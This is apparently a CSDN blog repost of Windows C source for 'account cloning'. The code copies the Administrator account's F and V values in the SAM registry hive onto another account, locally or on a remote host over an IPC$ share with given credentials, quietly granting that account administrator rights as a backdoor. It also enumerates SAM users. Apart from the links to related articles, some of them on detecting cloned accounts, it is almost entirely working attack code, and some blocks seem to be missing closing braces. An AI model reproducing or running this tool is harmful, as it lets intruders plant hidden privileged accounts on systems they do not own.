克隆帐户简单演示

最新推荐文章于 2024-05-14 19:27:54 发布
最新推荐文章于 2024-05-14 19:27:54 发布
阅读量1.3k 收藏
点赞数
文章标签: null access buffer system path
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kgdiwss/article/details/425734
版权


#define DEBUGMSG

#include <windows.h>

#include <winnetwk.h>

#include <tchar.h>

#include <stdio.h>

#pragma comment(lib,"mpr.lib")

#define Debug(x) OutputDebugString(TEXT(x))

#define erron GetLastError()

#define ALLOCBUFFER (1024*10)

#define REMOTE_HOST_LEN 20

#define SET_CONNECT_IPC 0 //使用IPC

#define NOT_CONNECT_IPC 1 //不使用

typedef struct ipcinfo

{

TCHAR RemoteIP[REMOTE_HOST_LEN]; //远程IP

TCHAR RemoteUser[REMOTE_HOST_LEN]; //用户名

TCHAR RemotePass[REMOTE_HOST_LEN]; //密码

UINT IsIPC:1; //是否使用IPC

}IPCINFO,*PIPCINFO,*LPIPCINFO;

TCHAR ipc[100]={0};

TCHAR name[50][100]={0};

DWORD KeyN=0;

//克隆帐户

BOOL CloneUser (IN TCHAR *CloneUser,IN LPIPCINFO lpIpcInfo);

BOOL OpenKey (IN TCHAR *OpenKey,IN HKEY ConnhKey); //打开子键

BOOL ViewUser (IN TCHAR *ViewKey); //枚举注册表用户信息

BOOL ListUser (IN LPIPCINFO lpIpcInfo); //列出注册表用户信息

BOOL ConnIPC (IN LPIPCINFO lpIpcInfo); //IPC连接

//错误处理

inline void MessageError (TCHAR *FuncName,DWORD ErrorId,BOOL MsgFlag)

{

TCHAR *Message=NULL;

TCHAR MsgError[MAX_PATH]={0};

FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,

ErrorId,MAKELANGID(LANG_NEUTRAL,SUBLANG_DEFAULT),(TCHAR *)&Message,0,NULL);

if (MsgFlag)

_ftprintf(stderr,TEXT("%s GetLastError reports %d and %s/n"),FuncName,ErrorId,Message);

if (!MsgFlag)

{

_stprintf(MsgError,TEXT("%s GetLastError reports %d and %s/n"),FuncName,ErrorId,Message);

Debug(MsgError);

}

if (Message)

LocalFree(Message);

}

BOOL CloneUser (IN TCHAR *CloneUser,IN LPIPCINFO lpIpcInfo)

{

HKEY ConnhKey=NULL,hKey=NULL,ClonehKey=NULL;

LPBYTE lpDataF=NULL,lpDataV=NULL;

TCHAR CloneSid[100]={0},MachineName[20]={0}; 

DWORD lpSizeF=ALLOCBUFFER,lpSizeV=ALLOCBUFFER;

DWORD RegType=REG_BINARY;

BOOL Flag=FALSE;

__try

{

if (lpIpcInfo->IsIPC==SET_CONNECT_IPC) //进程IPC连接

{

_tprintf(TEXT("Connect remote registry....../n"));

if (!(ConnIPC(lpIpcInfo)))

{

Flag=TRUE;

__leave;

}

_tcscpy(MachineName,TEXT(""));

_tcscat(MachineName,lpIpcInfo->RemoteIP);

//连接远程注册表

if (RegConnectRegistry(MachineName,HKEY_LOCAL_MACHINE,&ConnhKey)!=ERROR_SUCCESS)

{

#ifdef DEBUGMSG

MessageError("RegConnectRegistry()",erron,TRUE);

#endif

Flag=TRUE;

__leave;

}

}

else

{

ConnhKey=HKEY_LOCAL_MACHINE;

}

lpDataF=(LPBYTE) malloc (ALLOCBUFFER);

lpDataV=(LPBYTE) malloc (ALLOCBUFFER);

if (lpDataF==NULL || lpDataV==NULL)

{

#ifdef DEBUGMSG

MessageError("malloc()",erron,TRUE);

#endif 

Flag=TRUE;

__leave;

_tcscpy(CloneSid,TEXT("SAM//SAM//Domains//Account//Users//00000"));

_tcscat(CloneSid,CloneUser);

//打开Aministrator

if (RegOpenKeyEx(ConnhKey,TEXT("SAM//SAM//Domains//Account//Users//000001F4"),0,KEY_ALL_ACCESS,&hKey)!=ERROR_SUCCESS)

{

#ifdef DEBUGMSG

MessageError("RegOpenKeyEx()",erron,TRUE);

#endif

Flag=TRUE;

__leave;

//获取F信息

if(RegQueryValueEx(hKey,TEXT("F"),NULL,&RegType,lpDataF,&lpSizeF)!=ERROR_SUCCESS)

{

#ifdef DEBUGMSG

MessageError("RegQueryValueEx()",erron,TRUE);

#endif

Flag=TRUE;

__leave;

//获取V信息

if(RegQueryValueEx(hKey,TEXT("V"),NULL,&RegType,lpDataV,&lpSizeV)!=ERROR_SUCCESS)

{

#ifdef DEBUGMSG

MessageError("RegQueryValueEx()",erron,TRUE);

#endif

Flag=TRUE;

__leave;;

}

//打开需要克隆的帐户

if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,CloneSid,0,KEY_ALL_ACCESS,&ClonehKey)!=ERROR_SUCCESS)

{

#ifdef DEBUGMSG

MessageError("RegOpenKeyEx()",erron,TRUE);

#endif

Flag=TRUE;

__leave;

}

//设置F

if (RegSetValueEx(ClonehKey,TEXT("F"),0,REG_BINARY,lpDataF,lpSizeF)!=ERROR_SUCCESS)

{

#ifdef DEBUGMSG

MessageError("RegSetValueEx()",erron,TRUE);

#endif

Flag=TRUE;

__leave;

}

//设置V

if (RegSetValueEx(ClonehKey,TEXT("V"),0,REG_BINARY,lpDataV,lpSizeV)==ERROR_SUCCESS)

{

_tprintf(TEXT("Clone User Success/n"));

}

else

{

#ifdef DEBUGMSG

MessageError("RegSetValueEx()",erron,TRUE);

#endif

Flag=TRUE;

__leave;

}

}

__finally

{

if (lpDataF)

free(lpDataF);

if (lpDataV)

free(lpDataV);

if (hKey)

RegCloseKey(hKey);

if (ClonehKey)

RegCloseKey(ClonehKey);

}

if (Flag)

return FALSE;

else

return TRUE;

}

BOOL OpenKey (IN TCHAR *OpenKey,IN HKEY ConnhKey)

{

HKEY hKey=NULL;

TCHAR TempName[100]={0},BufferName[100]={0};

DWORD TempSize=100,ret=0;

if (RegOpenKeyEx(ConnhKey,OpenKey,0,KEY_ALL_ACCESS,&hKey)!=ERROR_SUCCESS)

{

#ifdef DEBUGMSG

MessageError("RegOpenKeyEx()",erron,TRUE);

#endif 

return FALSE;

}

for (DWORD i=0,Index=0; ret==ERROR_SUCCESS; i++,Index++,KeyN++)

{

//枚举用户

ret=RegEnumKeyEx(hKey,Index,TempName,&TempSize,NULL,NULL,NULL,NULL);

_tcscat(name,TempName);

memset(TempName,0,sizeof (TempName));

TempSize=sizeof (TempName);

Sleep(50);

}

if (hKey)

RegCloseKey(hKey);

return TRUE;

}

BOOL ViewUser (IN TCHAR *ViewKey)

{

HKEY hKey=NULL;

DWORD RegType=0;

if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,ViewKey,0,KEY_ALL_ACCESS,&hKey)!=ERROR_SUCCESS)

{

#ifdef DEBUGMSG

MessageError("RegOpenKeyEx()",erron,TRUE);

#endif 

return FALSE;

}

if (RegQueryValueEx(hKey,NULL,NULL,&RegType,NULL,NULL)!=ERROR_SUCCESS)

{

#ifdef DEBUGMSG

MessageError("RegOpenKeyEx()",erron,TRUE);

#endif

RegCloseKey(hKey); 

return FALSE;

}

_tprintf(TEXT(" %X/n"),RegType);

if (hKey)

RegCloseKey(hKey);

return TRUE;

}

BOOL ListUser (IN LPIPCINFO lpIpcInfo)

{

HKEY ConnhKey=NULL;

TCHAR MachineName[20]={0};

TCHAR RegTemp[50]={0};

TCHAR RegBuffer[100]={TEXT("SAM//SAM//Domains//Account//Users//Names//")};

DWORD ret=0;

if (lpIpcInfo->IsIPC==SET_CONNECT_IPC)

{

_tprintf(TEXT("Connect remote registry....../n"));

if (!(ConnIPC(lpIpcInfo)))

return FALSE;

_tcscpy(MachineName,TEXT(""));

_tcscat(MachineName,lpIpcInfo->RemoteIP);

if (RegConnectRegistry(MachineName,HKEY_LOCAL_MACHINE,&ConnhKey)!=ERROR_SUCCESS)

{

#ifdef DEBUGMSG

MessageError("RegConnectRegistry()",erron,TRUE);

#endif

return FALSE;

}

}

else

{

ConnhKey=HKEY_LOCAL_MACHINE;

}

if (!(OpenKey(TEXT("SAM//SAM//Domains//Account//Users//Names"),ConnhKey)))

return FALSE;

for (DWORD n=0; n<KeyN-1; n++)

{

_tcscat(RegBuffer,name[n]);

wsprintf(RegTemp,name[n]);

_tcscat(RegTemp,TEXT(" ===>"));

_tprintf(TEXT("%s"),RegTemp);

if (!(ViewUser(RegBuffer)))

return FALSE;

_tcscpy(RegBuffer,TEXT("SAM//SAM//Domains//Account//Users//Names//"));

Sleep(10);

}

return TRUE;

}

BOOL ConnIPC (IN LPIPCINFO lpIpcInfo)

{

NETRESOURCE nr;

_sntprintf(ipc,sizeof (ipc)-1,TEXT("%s//ipc$"),lpIpcInfo->RemoteIP);

nr.lpLocalName=NULL;

nr.lpProvider=NULL;

nr.dwType=RESOURCETYPE_ANY;

nr.lpRemoteName=ipc;

if (WNetAddConnection2(&nr,lpIpcInfo->RemotePass,lpIpcInfo->RemoteUser,0))

{

#ifdef DEBUGMSG

MessageError("WNetAddConnection2()",erron,TRUE);

#endif 

return FALSE;

}

return TRUE;

}

int main (int argc,TCHAR *argv[])

{

IPCINFO IpcInfo={0};

if (argc==1)

{

_tprintf(TEXT("Code by dahubaobao/n"));

return 0;

}

if (argc==3) //本地克隆

{

if (_tcsicmp(argv[1],TEXT("-c"))==0)

{

if (_tcslen(argv[2])>5)

{

_tprintf(TEXT("User sid no larger than /"5/"/n"));

return 0;

}

IpcInfo.IsIPC=NOT_CONNECT_IPC; //不使用IPC连接

if (!(CloneUser(argv[2],&IpcInfo)))

return 0;

}

}

if (argc==6) //远程克隆

{

if (_tcsicmp(argv[1],TEXT("-c"))==0)

{

if (_tcslen(argv[2])>5)

{

_tprintf(TEXT("User sid no larger than /"5/"/n"));

return 0;

}

IpcInfo.IsIPC=SET_CONNECT_IPC; //使用IPC

_tcsncpy(IpcInfo.RemoteIP,argv[3],REMOTE_HOST_LEN-1);

_tcsncpy(IpcInfo.RemoteUser,argv[4],REMOTE_HOST_LEN-1);

_tcsncpy(IpcInfo.RemotePass,argv[5],REMOTE_HOST_LEN-1);

if (!(CloneUser(argv[2],&IpcInfo)))

return 0;

}

}

if (argc==2) //列出本地用户

{

if (_tcsicmp(argv[1],TEXT("-l"))==0)

{

IpcInfo.IsIPC=NOT_CONNECT_IPC;

if (!(ListUser(&IpcInfo)))

return 0;

}

}

if (argc==5) //列出远程用户

{

if (_tcsicmp(argv[1],TEXT("-l"))==0)

{

IpcInfo.IsIPC=SET_CONNECT_IPC;

_tcsncpy(IpcInfo.RemoteIP,argv[2],REMOTE_HOST_LEN-1);

_tcsncpy(IpcInfo.RemoteUser,argv[3],REMOTE_HOST_LEN-1);

_tcsncpy(IpcInfo.RemotePass,argv[4],REMOTE_HOST_LEN-1);

if (!(ListUser(&IpcInfo)))

return 0;

}

}

if (IpcInfo.IsIPC==SET_CONNECT_IPC)

{

if (WNetCancelConnection2(ipc,0,TRUE)) //断开IPC

{

#ifdef DEBUGMSG

MessageError("WNetCancelConnection2()",erron,TRUE);

#endif

return 0;

}

}

return 0;

}

来源:dahu_baobao

kgdiwss
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Petsy:Etsy克隆
03-21
在模态内部,单击“演示”登录按钮以演示用户身份登录,而无需创建帐户。或使用您的凭据登录(如果您有一个帐户)。用法产品清单您可以通过页面顶部的导航栏浏览该站点,该站点当前分为两类产品,即“宠物”和“物品...
littlejohn:罗宾汉克隆
05-21
LittleJohn是用于跟踪,发现和交易股票的交易应用程序,旨在成为流行交易应用程序的完美像素克隆。 鹳只上去! 技术领域 前端 Java脚本 简讯 引导程序 React + Redux Webpack / NPM 后端 Ruby on Rails PostgreSQL...
[第7天]继续讲,从克隆帐号 讲起
weixin_33748818的博客
03-29 106
前2天基本的一些东西都讲过了,今天我觉得得把克隆帐号这个问题讲清楚了 什么叫克隆帐号 ?前辈说:在注册表中有两处保存了帐号的SID相对标志符,一处是SAM\Domains\Account \Users下的子键名,另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误,登陆时用的是后者,查询时用前者。当用admin的F项覆盖其他帐号的F项后,就造成了帐号是管理员权限但查询...
克隆帐户建立/删除工具
afterain的专栏
07-25 1766
最隐藏的系统后门都具备些什么特点?首先必须功能强大,可以对系统进行完全控制,其次就是隐蔽性好。能躲过杀毒软件的法眼。这种后门有吗,答案是肯定的,除了专门的病毒以外存在于系统中的隐藏帐户也具有这种特性。隐藏帐户分为两种,一种是简单隐藏,即无法在命令提示符中查看到的隐藏帐户;第二种是完全隐藏,不出现在控制面板的用户帐户中,即使发现了也无法删除,只有通过专业工具才能清除。隐藏帐户
应急响应 - Windows用户分析,Windows隐藏账号分析,Windows克隆账号分析_怎么发现windows账户被克隆(1)
最新发布
2401_84968248的博客
05-14 530
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
帐户克隆及其防范对策
testalllife的专栏
05-19 819
一、克隆帐户原理:我们的帐户在注册表里都有他相应的键值,具体在 "[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users "administrator 的 项为 "000001F4"下面有 2个二进制值 一个 是"F"一个是"V"。我一般克隆的都是 Guest用户,所以我就拿这个克隆这个用户做例子,克隆其他用户方法相同。Guest的项为 "00000
应急响应 - Windows用户分析,Windows隐藏账号分析,Windows克隆账号分析
热门推荐
wangyuxiang946的博客
04-20 1万+
一、普通用户 二、隐藏用户 1、lusrmgr.msc 2、注册表 三、克隆账号
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 788
任务环境说明:服务器场景:Server1。
alrightCupid:OKCupid克隆,允许用户创建帐户,编辑个人描述和搜索其他用户
04-29
alrightCupid是流行的约会网站OKCupid的克隆。 它有一个Ruby on Rails / PostgreSQL后端和一个React / Redux前端。 特征 使用BCrypt完成前端/后端用户身份验证 用户可以创建和编辑描述问题(只有18岁以上的用户) ...
cicd-demo:CICD演示
03-05
type=n1-standard-2 克隆此存储库,并在Makefile的顶部设置以下变量: DOMAIN-公开Lighthouse钩子和Tekton仪表板的域GITHUB_BOT-用于自动化的GitHub bot帐户GITHUB_OWNER-克隆存储库的所有者GITHUB_REPOSITORY-克隆...
演示速度运行
02-12
一键克隆并部署只需单击几下,即可开始使用自己的网站版本。 下面的按钮会将这个到您自己的GitHub帐户,并将其链接到上的新站点当地发展要构建站点,您需要: (和npm)-运行构建用于本地Netlify物品入门# clone ...
克隆帐户终结篇修正版
| 活著已是悲劇 ㄖ 生存亦是惡意 |
02-22 897
来源:岁月联盟  猪猪几句废话:黑基发了我的克隆帐户之终结篇后,很多朋友对我文章提出了宝贵意见.由于原文是自己无聊时随便写的,很多地方不够严谨.于是我重新整理了此文,补充了一些资料,修改了不够严谨的地方, 有问题欢迎来我blog上探讨.序:相信大家都用过克隆帐户吧。无论是用工具还是用手工,克隆帐户无疑是隐藏帐户的最好选择。但是看见网上的文章都讲的特别麻烦。这样那样的。其实克隆帐户简单。就
如何检查计算机账号克隆
weixin_44023460的博客
07-19 449
在系统中添加的非克隆账号,可以通过常规检查检查出来,但是如果入侵者在系统中对账号进行了克隆,一般克隆系统中已经存在账号,例如克隆aspnet账号、TsInternetuser、Guest等账号,通过“net user”、“net localgroup administrators”以及计算用户图形管理都是查不出来的,如果计算机开放了远程终端、安装了PcanyWhere等工具,则入侵者可以通过这些用户账号正常访问系统。如果在检查过程中,发现了多余的账号,则极有可能是入侵者添加的账号。图2 管理员组账号检查。
[抄袭]克隆账户检测工具
afterain的专栏
07-25 2014
转自 http://www.hooyeah.net/bbs/html/2007-9/24/14505481211.html纯属抄袭人家的汉化  大家可以对我随意进行鄙视呵呵  闹着玩的 LP_Check克隆账户检测.rar (143.27 KB)软件语言: hooyeah·饭团子 抄袭的汉化软件大小: 153 KB(已压缩)所属分类: 安全工具 授权方式: 免费≡≡≡≡本地管理员帐号检查,将拥有超
windows下克隆账户权限
huanongying131的博客
12-03 1190
转:https://blog.csdn.net/evergreen79/article/details/8720786 克隆账户权限:     1.进入注册表HLM \ SAM \ SAM,右击SAM,选择权限,添加administrator,然后赋予完全控制权限     2.按F5刷新,接着在SAM下出现文件夹     3.进入HLM \ SAM \SAM \ domains \ acc...
入侵检查-检查Windows系统账号安全克隆账号步骤
qq_34780861的博客
02-03 618
然后可以尝试用隐藏账户登录,可以发现和管理员的桌面完全一致(个别情况,桌面背景无法加载)注册表中找到管理员的键值,复制到i15pb$中。可以使用D盾工具,发现克隆账户。
【像黑客一样写博客之五】博客克隆
偶尔e网事
11-18 3793
很多情况下我们需要在不同电脑之间维护同一个Octopress博客,那应该怎么在一台新的电脑上获取你的Octopress克隆呢? 1.环境配置 安装msysgit,Ruby,DevKit,这里就不再重复了,请参考第一篇:环境搭建 http://blog.csdn.net/jackystudio/article/details/16117585。 2.克隆你的O
网络克隆工具_架设个人博客,别再将静态博客生成工具放到服务器上了!
weixin_39685836的博客
12-14 162
区别静态博客与动态博客静态博客一般使用静态博客生成工具Hexo、Hugo等服务端使用Nginx + 静态页面动态博客一般使用开源的博客项目Halo、Tale等(当然也可以选择自己开发)服务端使用Docker(可选) + Tomcat(Nginx) + 项目(可选H2数据库) + Mysql(可选嵌入式数据库)如何使用静态博客工具因为大部分小伙伴是Windows用户,演示将使用如下环境(如果你在Ma...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值